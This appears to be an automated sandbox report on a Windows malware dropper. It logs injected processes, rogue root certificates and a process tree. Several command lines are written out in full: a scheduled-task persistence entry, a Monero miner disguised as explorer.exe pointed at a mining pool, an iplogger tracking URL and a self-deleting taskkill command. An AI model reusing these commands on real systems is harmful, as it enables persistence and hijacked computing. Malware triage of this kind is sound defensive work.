Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  msedge.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  Install.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  Install.exe
-
Kills process with taskkill 2 IoCs
Processes:
pid  process
996  taskkill.exe
1032  taskkill.exe
-
Processes:
description ioc process Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Toolbar Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 -
Modifies registry class 21 IoCs
Processes:
description  ioc  process
Set value (data)  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Key created  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
Key created  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Set value (data)  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02
Key created  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1
Key created  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell
Key created  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
Key created  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings  rundll32.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202
Set value (data)  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff
Set value (str)  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"
Set value (data)  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000
Set value (data)  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 19002f433a5c000000000000000000000000000000000000000000
Set value (data)  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff
Key created  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0
Set value (int)  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2"
Key created  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\  msedge.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff
-
Modifies system certificate store 4 IoCs
Processes: sahiba_3.exe, rundll32.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 (sahiba_3.exe)
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob not reproduced) (sahiba_3.exe)
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D063264BC76898D4F1BD86741FD9D923F8DF8FA6 (rundll32.exe)
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D063264BC76898D4F1BD86741FD9D923F8DF8FA6\Blob = (certificate blob not reproduced) (rundll32.exe)
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
- pid 676
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Processes: sahiba_2.exe, jfiag3g_gg.exe, Chrome2.exe
- pid 4792 sahiba_2.exe (x2)
- pid 1780 jfiag3g_gg.exe (x2)
- pid 256 Chrome2.exe (x2)
- pid 676 (x58)
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
Processes: sahiba_2.exe
- pid 4792 sahiba_2.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
Processes:
Processes: msedge.exe
- pid 3492 msedge.exe (x4)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Processes: sahiba_4.exe, sahiba_5.exe, P1GlorySetp.exe, Chrome2.exe, system64.exe, BIRZAC~1.EXE, svchost.exe, q7qe_a0ikJj9r1Tt_dSq8ad5.exe, ItMkYX_n_SCidLEm796l_vOZ.exe
(token privilege, pid, process; in order of occurrence)
- SeDebugPrivilege 4756 sahiba_4.exe
- SeDebugPrivilege 1272 sahiba_5.exe
- SeDebugPrivilege 404 P1GlorySetp.exe
- SeDebugPrivilege 256 Chrome2.exe
- SeShutdownPrivilege 676, then SeCreatePagefilePrivilege 676 (pair x9)
- SeDebugPrivilege 3584 system64.exe
- SeShutdownPrivilege 676, then SeCreatePagefilePrivilege 676 (pair x1)
- SeDebugPrivilege 1548 BIRZAC~1.EXE
- SeShutdownPrivilege 676, then SeCreatePagefilePrivilege 676 (pair x11)
- SeTcbPrivilege 2268 svchost.exe (x5)
- SeShutdownPrivilege 676, then SeCreatePagefilePrivilege 676 (pair x4)
- SeDebugPrivilege 5332 q7qe_a0ikJj9r1Tt_dSq8ad5.exe
- SeDebugPrivilege 5472 ItMkYX_n_SCidLEm796l_vOZ.exe
- SeShutdownPrivilege 676
Suspicious use of FindShellTrayWindow 18 IoCs
Processes:
Processes: msedge.exe, rundll32.exe, Accostarmi.exe.pif
- pid 3492 msedge.exe
- pid 676 (x2)
- pid 3492 msedge.exe
- pid 676
- pid 3492 msedge.exe
- pid 676 (x4)
- pid 5680 rundll32.exe
- pid 5552 Accostarmi.exe.pif
- pid 676 (x2)
- pid 5552 Accostarmi.exe.pif (x2)
- pid 676 (x2)
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
Processes: Accostarmi.exe.pif
- pid 5552 Accostarmi.exe.pif (x3)
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
- pid 676 (x2)
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Processes: f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe, setup_installer.exe, setup_install.exe, cmd.exe (x8), sahiba_1.exe, sahiba_8.exe, sahiba_7.exe, Install2.EXE
(source pid and process, target pid and process; repeated calls collapsed with a count)
- PID 3796 (f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe) wrote to memory of 2504 (setup_installer.exe) x3
- PID 2504 (setup_installer.exe) wrote to memory of 1680 (setup_install.exe) x3
- PID 1680 (setup_install.exe) wrote to memory of 1640 (cmd.exe) x3
- PID 1680 (setup_install.exe) wrote to memory of 4980 (cmd.exe) x3
- PID 1680 (setup_install.exe) wrote to memory of 3724 (cmd.exe) x3
- PID 1680 (setup_install.exe) wrote to memory of 4236 (cmd.exe) x3
- PID 1680 (setup_install.exe) wrote to memory of 4860 (cmd.exe) x3
- PID 1680 (setup_install.exe) wrote to memory of 4856 (cmd.exe) x3
- PID 1680 (setup_install.exe) wrote to memory of 4824 (cmd.exe) x3
- PID 1680 (setup_install.exe) wrote to memory of 4908 (cmd.exe) x3
- PID 4824 (cmd.exe) wrote to memory of 1164 (sahiba_7.exe) x3
- PID 4860 (cmd.exe) wrote to memory of 1272 (sahiba_5.exe) x2
- PID 4908 (cmd.exe) wrote to memory of 4748 (sahiba_8.exe) x3
- PID 4236 (cmd.exe) wrote to memory of 4756 (sahiba_4.exe) x2
- PID 4980 (cmd.exe) wrote to memory of 4792 (sahiba_2.exe) x3
- PID 1640 (cmd.exe) wrote to memory of 4784 (sahiba_1.exe) x3
- PID 3724 (cmd.exe) wrote to memory of 1504 (sahiba_3.exe) x3
- PID 4856 (cmd.exe) wrote to memory of 1912 (sahiba_6.exe) x3
- PID 4784 (sahiba_1.exe) wrote to memory of 308 (sahiba_1.exe) x3
- PID 4748 (sahiba_8.exe) wrote to memory of 256 (Chrome2.exe) x2
- PID 1164 (sahiba_7.exe) wrote to memory of 2104 (jfiag3g_gg.exe) x3
- PID 4748 (sahiba_8.exe) wrote to memory of 848 (Install2.EXE) x2
- PID 848 (Install2.EXE) wrote to memory of 3464 (BIRZAC~1.EXE) x2
Processes
(each entry: [tree depth] image path, then the command line, then the behaviors flagged for that process)

[1] C:\Users\Admin\AppData\Local\Temp\f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\setup_install.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\setup_install.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c sahiba_8.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_8.exe
            cmdline: sahiba_8.exe
            - Executes dropped EXE
            - Checks computer location settings
            - Suspicious use of WriteProcessMemory
          [6] C:\Users\Admin\AppData\Local\Temp\Chrome2.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\Chrome2.exe"
              - Executes dropped EXE
              - Checks computer location settings
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\System32\cmd.exe
                cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit
              [8] C:\Windows\system32\schtasks.exe
                  cmdline: schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'
                  - Creates scheduled task(s)
            [7] C:\Users\Admin\AppData\Roaming\system64.exe
                cmdline: "C:\Users\Admin\AppData\Roaming\system64.exe"
                - Executes dropped EXE
                - Checks computer location settings
                - Suspicious use of SetThreadContext
                - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\System32\cmd.exe
                  cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit
                [9] C:\Windows\system32\schtasks.exe
                    cmdline: schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'
                    - Creates scheduled task(s)
              [8] C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                  cmdline: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                  - Executes dropped EXE
                  - Checks computer location settings
                [9] C:\Users\Admin\AppData\Roaming\system64.exe
                    cmdline: "C:\Users\Admin\AppData\Roaming\system64.exe"
                    - Executes dropped EXE
                    - Checks computer location settings
                    - Suspicious use of SetThreadContext
                  [10] C:\Windows\System32\cmd.exe
                      cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit
                    [11] C:\Windows\system32\schtasks.exe
                        cmdline: schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'
                        - Creates scheduled task(s)
                  [10] C:\Windows\explorer.exe
                      cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 --user=sadikmalik1@gmail.com --pass= --cpu-max-threads-hint=80
                    [11] C:\Windows\system32\WerFault.exe
                        cmdline: C:\Windows\system32\WerFault.exe -u -p 464 -s 288
                        - Program crash
                    [11] C:\Windows\system32\WerFault.exe
                        cmdline: C:\Windows\system32\WerFault.exe -u -p 464 -s 292
                        - Program crash
              [8] C:\Windows\explorer.exe
                  cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 --user=sadikmalik1@gmail.com --pass= --cpu-max-threads-hint=80
                [9] C:\Windows\system32\WerFault.exe
                    cmdline: C:\Windows\system32\WerFault.exe -u -p 1344 -s 300
                    - Program crash
                [9] C:\Windows\system32\WerFault.exe
                    cmdline: C:\Windows\system32\WerFault.exe -u -p 1344 -s 304
                    - Program crash
          [6] C:\Users\Admin\AppData\Local\Temp\Install2.EXE
              cmdline: "C:\Users\Admin\AppData\Local\Temp\Install2.EXE"
              - Executes dropped EXE
              - Adds Run key to start application
              - Suspicious use of WriteProcessMemory
            [7] C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
                cmdline: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
                - Executes dropped EXE
                - Suspicious use of SetThreadContext
              [8] C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
                  cmdline: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
                  - Executes dropped EXE
              [8] C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
                  cmdline: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
                  - Executes dropped EXE
                  - Suspicious use of AdjustPrivilegeToken
            [7] C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE
                cmdline: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE
                - Executes dropped EXE
                - Checks computer location settings
              [8] C:\Windows\SysWOW64\cmd.exe
                  cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zSBBDB.tmp\Install.cmd" "
                [9] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Df2r7
                    - Adds Run key to start application
                    - Enumerates system info in registry
                    - Modifies registry class
                    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    - Suspicious use of FindShellTrayWindow
                  [10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8156846f8,0x7ff815684708,0x7ff815684718
                  [10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
                  [10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
                  [10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:8
                  [10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:1
                  [10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:1
                  [10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5300 /prefetch:8
                  [10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1
                  [10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
                  [10] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5980 /prefetch:8
                  [10] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                      - Drops file in Program Files directory
                    [11] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff6b0235460,0x7ff6b0235470,0x7ff6b0235480
                  [10] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5980 /prefetch:8
          [6] C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe"
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c sahiba_7.exe
          - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c sahiba_6.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_6.exe
            cmdline: sahiba_6.exe
            - Executes dropped EXE
            - Checks computer location settings
          [6] C:\Users\Admin\Documents\q7qe_a0ikJj9r1Tt_dSq8ad5.exe
              cmdline: "C:\Users\Admin\Documents\q7qe_a0ikJj9r1Tt_dSq8ad5.exe"
              - Executes dropped EXE
              - Checks computer location settings
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Users\Admin\AppData\Local\Temp\bdd506f1-f2b8-464c-be8a-328fdc7c3369.exe
                cmdline: "C:\Users\Admin\AppData\Local\Temp\bdd506f1-f2b8-464c-be8a-328fdc7c3369.exe"
                - Executes dropped EXE
                - Checks processor information in registry
          [6] C:\Users\Admin\Documents\RTLIv59rgr2ywOZxYERl3i7d.exe
              cmdline: "C:\Users\Admin\Documents\RTLIv59rgr2ywOZxYERl3i7d.exe"
              - Executes dropped EXE
              - Checks computer location settings
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 624
                - Program crash
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 780
                - Program crash
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 1292
                - Program crash
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 1300
                - Program crash
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 1344
                - Program crash
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 1324
                - Program crash
            [7] C:\Windows\SysWOW64\cmd.exe
                cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "RTLIv59rgr2ywOZxYERl3i7d.exe" /f & erase "C:\Users\Admin\Documents\RTLIv59rgr2ywOZxYERl3i7d.exe" & exit
              [8] C:\Windows\SysWOW64\taskkill.exe
                  cmdline: taskkill /im "RTLIv59rgr2ywOZxYERl3i7d.exe" /f
                  - Kills process with taskkill
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 1376
                - Program crash
          [6] C:\Users\Admin\Documents\GGZuKAvlVgsiOJtG4ZvHBMf8.exe
              cmdline: "C:\Users\Admin\Documents\GGZuKAvlVgsiOJtG4ZvHBMf8.exe"
              - Executes dropped EXE
              - Loads dropped DLL
              - Checks processor information in registry
          [6] C:\Users\Admin\Documents\5yfazEzcdUiOwhyVDRk6VI26.exe
              cmdline: "C:\Users\Admin\Documents\5yfazEzcdUiOwhyVDRk6VI26.exe"
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
            [7] C:\Users\Admin\Documents\5yfazEzcdUiOwhyVDRk6VI26.exe
                cmdline: C:\Users\Admin\Documents\5yfazEzcdUiOwhyVDRk6VI26.exe
                - Executes dropped EXE
          [6] C:\Users\Admin\Documents\OdWkSXo7oi5oqr8oooXgrl2n.exe
              cmdline: "C:\Users\Admin\Documents\OdWkSXo7oi5oqr8oooXgrl2n.exe"
              - Executes dropped EXE
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 424
                - Program crash
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 440
                - Program crash
          [6] C:\Users\Admin\Documents\70pVl2zvsfL6bROCn__7iQJN.exe
              cmdline: "C:\Users\Admin\Documents\70pVl2zvsfL6bROCn__7iQJN.exe"
            [7] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
          [6] C:\Users\Admin\Documents\ItMkYX_n_SCidLEm796l_vOZ.exe
              cmdline: "C:\Users\Admin\Documents\ItMkYX_n_SCidLEm796l_vOZ.exe"
              - Executes dropped EXE
              - Suspicious use of NtSetInformationThreadHideFromDebugger
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Users\Admin\Documents\puFib_mN6HqGzK5uF14kFFxZ.exe
              cmdline: "C:\Users\Admin\Documents\puFib_mN6HqGzK5uF14kFFxZ.exe"
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
              - Checks processor information in registry
            [7] C:\Windows\SysWOW64\rundll32.exe
                cmdline: "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                - Blocklisted process makes network request
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 600
                - Program crash
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 968
                - Program crash
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 868
                - Program crash
            [7] C:\Windows\SysWOW64\WerFault.exe
